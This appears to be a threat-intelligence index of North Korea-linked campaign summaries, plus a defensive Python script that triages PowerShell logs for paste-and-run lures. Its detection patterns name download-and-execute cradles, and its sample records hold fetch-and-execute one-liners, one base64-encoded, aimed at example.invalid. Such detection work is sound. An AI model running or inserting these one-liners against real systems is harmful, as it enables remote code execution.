Moonlock describes a fake-interview campaign that lures job seekers into running commands from malicious recruiting sites, with a focus on cryptocurrency theft. The macOS chain downloads ffmpeg.sh, selects an ARM or Intel VCam archive from attacker infras…
2025: 778 reports
The source reports a hacking email campaign that impersonated a Seoul city official and was suspected to be the work of North Korea-linked Kimsuky. Although the archived body is sparse, the report provides incident-level evidence of government-themed soci…
ESRC reported a spear-phishing campaign in which attackers impersonated business counterparts by abusing reply-chain context and spoofed sender names to make malicious emails appear trustworthy. The emails carried EGG archives containing PIF executables, …
Securonix observed the DEEP#DRIVE campaign attributed to Kimsuky targeting South Korean businesses, government entities, and cryptocurrency users with Korean-language phishing lures disguised as work logs, insurance documents, and crypto-related files. Th…
SecurityScorecard’s STRIKE team attributes Operation Marstech Mayhem to Lazarus Group and describes Marstech1 as an implant aimed at software developers and cryptocurrency wallets through manipulated open-source repositories. Attackers used fake GitHub re…
A sample shared as possible Lazarus malware was assessed as a North Korean backdoor likely representing a newer version of PEBBLEDASH. The campaign used a 64-bit dropper with a PDF icon and a decoy Oracle scheduled maintenance report tied to South Korean …
Recorded Future describes North Korean IT-worker operations that use false identities and remote employment to generate regime revenue while creating insider risk for international companies. Insikt Group links the broader threat to PurpleBravo activity o…
Secureworks CTU describes DPRK nationals posing as legitimate IT professionals to obtain employment inside unwitting organizations. The webinar frames the activity as an infiltration scheme with distinct applicant behavior, tooling, and warning signs that…
The second Nurilab analysis continues the Lazarus ClickFix malware chain and focuses on the final C# binary, Tvooly.exe, produced after seven stages of de-obfuscation, decryption, and C2 communication. Tvooly.exe uses obfuscation, AES-based resource decry…
The Malware Analysis Space post examines a Kimsuky/APT43 PowerShell sample associated with ASEC reporting on forceCopy malware used in spear phishing. The sample, identified by MD5 1e9d94d88fdac3c4a0a47a3a1d07e329, uses heavy obfuscation with reversed str…
CYFIRMA profiles APT43 as a North Korean state-sponsored operator linked to the Reconnaissance General Bureau and associated with aliases including Kimsuky, Emerald Sleet, TA427, Thallium, and Velvet Chollima. The profile emphasizes strategic intelligence…
Google Threat Intelligence Group framed cybercrime as a national security threat because criminal services, malware, and monetization channels support both financially motivated and state-linked activity. The report notes North Korean targeting of cryptoc…
Lazarus operators used LinkedIn recruiter personas to approach finance and travel-sector targets with a supposed decentralized exchange project. After collecting a CV or GitHub link, the attackers shared a GitHub or Bitbucket repository containing obfusca…
Microsoft Threat Intelligence has observed North Korean state actor Emerald Sleet (also known as Kimsuky and VELVET CHOLLIMA) using a new tactic: tricking targets into running PowerShell as an administrator and then pasting and running code provided by th…
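The defensive check a SOC would want for the paste-and-run tactic summarized above is a triage pass over PowerShell script-block telemetry. The script below is an added example for this entry, not code from Microsoft's report or from any page listed here. It assumes the analyst has the executed script text (as Windows ScriptBlock logging, Event ID 4104, records it) together with whether the host process was elevated; the indicator set, the scoring rule and the sample records are my own assumptions and constructions, not indicators published in the report, and they generalize beyond the one lure the report describes to other fetch-and-execute one-liners, including those hidden behind -EncodedCommand.

```python
"""Triage of PowerShell ScriptBlock log text for 'paste this into an elevated
PowerShell' lures. Added example; not code from the Microsoft report or any page
in this index. Assumes Event ID 4104 script text plus an 'elevated' flag per
record (assumption); indicators and sample records are my own constructions."""
import base64
import re

# Generic indicators for one-liners that fetch and run a second stage.
# Chosen as heuristics for this example; not indicators published in the report.
INDICATORS = {
    "remote_fetch": re.compile(
        r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget)\b|DownloadString|DownloadFile",
        re.I),
    "in_memory_exec": re.compile(r"\b(Invoke-Expression|iex)\b", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    "bypass_policy": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "elevation_request": re.compile(r"-Verb\s+RunAs", re.I),
}
ENCODED_RX = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def encode_command(cmd):
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_encoded_commands(text):
    """Append the decoded payload of each -EncodedCommand so indicators inside it become visible."""
    expanded = text
    for m in ENCODED_RX.finditer(text):
        try:
            expanded += "\n" + base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
        except ValueError:  # binascii.Error is a ValueError: not base64, skip it
            continue
    return expanded


def score_script_block(script):
    """Return the indicator names present in the script text, after expanding encoded commands."""
    expanded = decode_encoded_commands(script)
    return [name for name, rx in INDICATORS.items() if rx.search(expanded)]


def triage(records, min_score=2):
    """Flag records whose indicator count (plus one if the shell ran elevated) reaches min_score."""
    flagged = []
    for rec in records:
        hits = score_script_block(rec["script"])
        score = len(hits) + (1 if rec.get("elevated") else 0)
        if score >= min_score:
            flagged.append({"host": rec["host"], "user": rec["user"], "score": score, "hits": hits})
    return flagged


# Constructed sample records (not real telemetry); example.invalid is a reserved test domain.
SAMPLE_RECORDS = [
    {"host": "WS-01", "user": "admin", "elevated": True,
     "script": "Get-Service | Where-Object Status -eq 'Running'"},
    {"host": "WS-02", "user": "jdoe", "elevated": True,
     "script": "iex (iwr 'https://example.invalid/fix.ps1' -UseBasicParsing).Content"},
    {"host": "WS-03", "user": "jdoe", "elevated": False,
     "script": "powershell -w hidden -ep bypass -enc "
               + encode_command("iex (irm https://example.invalid/stage2)")},
    {"host": "WS-04", "user": "dev", "elevated": False,
     "script": "Invoke-WebRequest https://example.invalid/readme.txt -OutFile readme.txt"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_RECORDS):
        print(f"{hit['host']} {hit['user']} score={hit['score']} hits={','.join(hit['hits'])}")
```

The scoring deliberately keeps a plain elevated admin command (WS-01) and a plain download to disk (WS-04) below the threshold, and it only surfaces the fetch-and-execute pattern once the encoded payload has been expanded, which is the step most signature-only rules miss.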
South Korean authorities were reportedly investigating a breach of a developer for On-Nara, the government-wide electronic document management system used for drafting, reviewing, approving, and sharing official documents. The article says the intrusion w…